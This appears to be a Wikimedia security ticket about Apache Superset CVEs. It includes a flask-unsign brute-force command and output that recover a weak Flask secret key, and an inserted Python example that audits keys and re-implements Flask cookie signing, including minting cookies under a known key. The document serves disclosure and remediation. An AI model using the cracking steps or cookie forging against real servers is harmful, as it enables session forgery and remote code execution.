Description
Details
- Risk Rating
- Medium
- Author Affiliation
- WMF Technology Dept
Related Objects
- Mentioned In
- T355652: Upgrade to 3.1.0
Event Timeline
There is also a separate issue which is a configuration-based Remote Code Execution vulnerability in the superset.wmcloud.org instance (not the superset.wikimedia.org instance), caused by the use of a guessable secret key in the Flask superset configuration as described in this article: https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
flask-unsign --unsign --cookie < superset-wmcloud-cookie
[*] Session decodes to: {'_fresh': True, '_id': '9cb...[truncating]', ''), 'oauth_provider': 'mediawiki', 'oauth_state': '5JeER5yK7NYS9OUia1UFiCYo2uCtvc'}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[*] Attempted (2176): -----BEGIN PRIVATE KEY-----ECR
[+] Found secret key after 21248 attempts25zckjdhdgeA 'thisISaSECRET_1234'
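As an added illustration of why the recovered key matters and what to check when rotating it (this is example code written for this page, not part of the ticket, of Superset or of Flask): a small audit that flags a SECRET_KEY which is a known placeholder or too short, a generator for a replacement of the size Superset's docs recommend, and a stdlib re-implementation of how Flask signs its session cookie (HMAC-SHA1 over the payload and timestamp, keyed with HMAC(SECRET_KEY, "cookie-session")) so you can confirm that cookies issued under the old key stop verifying once the key is rotated. The weak-key list, the 32-byte threshold and the sample session dict are assumptions constructed here; 'thisISaSECRET_1234' is the value shown above and 'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET' is the placeholder shipped in Superset's default config.py.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import List, Optional

# Constructed list of values that must never be used as SECRET_KEY.
# 'thisISaSECRET_1234' is the value recovered in the ticket above;
# 'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET' is the placeholder in Superset's
# shipped config.py. Assumption: extend this set with the other defaults
# enumerated in the linked article.
KNOWN_WEAK_SECRETS = {
    "thisISaSECRET_1234",
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
}
MIN_SECRET_BYTES = 32  # assumed local policy threshold, not a Flask requirement


def audit_secret_key(secret_key: str) -> List[str]:
    """Return findings for a configured SECRET_KEY; empty list means it passed."""
    findings = []
    if secret_key in KNOWN_WEAK_SECRETS:
        findings.append("known default/placeholder value")
    if len(secret_key.encode()) < MIN_SECRET_BYTES:
        findings.append(f"shorter than {MIN_SECRET_BYTES} bytes")
    return findings


def generate_secret_key() -> str:
    """42 random bytes, URL-safe base64: same size as `openssl rand -base64 42`."""
    return secrets.token_urlsafe(42)


def _b64(data: bytes) -> bytes:
    # itsdangerous-style base64: URL-safe alphabet, '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derived_key(secret_key: str) -> bytes:
    # Flask's session interface: key_derivation="hmac", salt="cookie-session", sha1
    return hmac.new(secret_key.encode(), b"cookie-session", hashlib.sha1).digest()


def sign_session(secret_key: str, session: dict, now: Optional[int] = None) -> str:
    """Produce a cookie in Flask's layout: <payload>.<timestamp>.<signature>."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    ts = int(time.time() if now is None else now)
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = _b64(payload) + b"." + _b64(ts_bytes)
    sig = _b64(hmac.new(_derived_key(secret_key), value, hashlib.sha1).digest())
    return (value + b"." + sig).decode()


def verify_session(secret_key: str, cookie: str,
                   max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the cookie verifies under secret_key, else None."""
    try:
        value, sig = cookie.encode().rsplit(b".", 1)
        body, ts_b64 = value.rsplit(b".", 1)
    except ValueError:
        return None  # not three dot-separated parts
    expected = _b64(hmac.new(_derived_key(secret_key), value, hashlib.sha1).digest())
    if not hmac.compare_digest(expected, sig):
        return None  # signed under a different key, or tampered with
    issued_at = int.from_bytes(_unb64(ts_b64), "big")
    if max_age is not None and time.time() - issued_at > max_age:
        return None
    # A leading '.' marks a zlib-compressed payload (itsdangerous convention).
    raw = zlib.decompress(_unb64(body[1:])) if body.startswith(b".") else _unb64(body)
    return json.loads(raw)


if __name__ == "__main__":
    old_key = "thisISaSECRET_1234"
    print("audit of old key:", audit_secret_key(old_key))
    new_key = generate_secret_key()
    print("audit of new key:", audit_secret_key(new_key))
    # Constructed session resembling the one decoded above.
    cookie = sign_session(old_key, {"_fresh": True, "oauth_provider": "mediawiki"})
    print("verifies under old key:", verify_session(old_key, cookie) is not None)
    print("verifies under new key:", verify_session(new_key, cookie) is not None)
```

The last two lines of the demo are the point for the remediation discussed in this task: rotating SECRET_KEY makes every cookie signed under the old value fail verification, so all existing sessions are invalidated and users have to log in again, and anyone who recovered the old key can no longer mint cookies the server accepts.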
Thanks for adding us.
For the superset.wikimedia.org instance, these CVEs are already being tracked by T335356
For the superset.wmcloud.org instance, I suspect that @rook will be the person best placed to advise on our level of exposure and/or notify other people in the WMCS team to have a look at it.
I agree with the comment in T345928#9152910 that we should also change the secret key on the cloud instance as soon as possible.
So I'm going to remove Data-Platform-SRE for now as it's not our team, but subscribe to the ticket and I'll check back soon to make sure that it's being handled.
Assuming I checked everything correctly (always worth questioning that one), the newest helm chart appears to still be on 2.1.0:
superset/superset 0.10.6 2.1.0 Apache Superset is a modern, enterprise-ready b...
Should be easy to bump once they release a new helm chart.
Any reason not to make this task public? I'm not really seeing any unless the separate RCE/secret key issue above is still a concern.